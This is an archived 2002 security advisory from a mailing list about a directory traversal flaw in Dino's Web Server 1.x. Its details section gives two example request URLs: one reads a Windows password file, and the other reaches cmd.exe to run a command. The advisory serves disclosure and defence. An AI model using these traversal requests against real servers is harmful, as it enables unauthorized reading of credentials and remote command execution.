[NT] Dino's Web Server Directory Traversal Vulnerability

From: support@securiteam.com
Date: 01/14/02

From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 14 Jan 2002 14:55:28 +0100 (CET)

- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Dino's Web Server Directory Traversal Vulnerability

SUMMARY

 <http://home.no.net/~nextgen/server/> Dino web server is a tiny webserver
- all it does is to publish your web site from whatever Windows based
operating system. A vulnerability has been discovered in Dino's web server
that allows a remote attacker to view the contents of arbitrary files.

DETAILS

Vulnerable systems:
Dino web server version 1.x

Dino's web server does not adequately filter '../' sequences from web
requests.

Example:
www.example.com/../windows/admin.pwl
Will show the password file.

www.example.com/../winnt/system32/cmd.exe?/c+dir+c:\
Will run the command 'dir c:\'.

ADDITIONAL INFORMATION

The information has been provided by <mailto:camaleon__500@hotmail.com>
Franc Ruiz Arenas.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [TOOL] WebServerFP, Web Server Fingerprint Tool
    ... HTTP code ... Currently only limited amounts of web server types are available. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [TOOL] Malloc() WebMiner, Web Server File and Directory Enumerator (Miner)
    ... to our service provider team. ... used to find common web server exposures and also ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] Xitami Web Server Plaintext Administrator Password Storage
    ... Xitami is a multithreaded Web server. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • ASP.Net horrow story and questions...
    ... - IIS Admin: LocalSystem account ... In IIS Manager on Web Server create a new Web Site ... Is there something wrong with my Wizard files? ...
  • RE: http://companyweb /remote /backup /Monitoring HELP
    ... entire Web site from the Internet" is selected. ... On the "Web Server Certificate" page, choose to create a new Web server ... Microsoft CSS Online Newsgroup Support ...
    (microsoft.public.windows.server.sbs)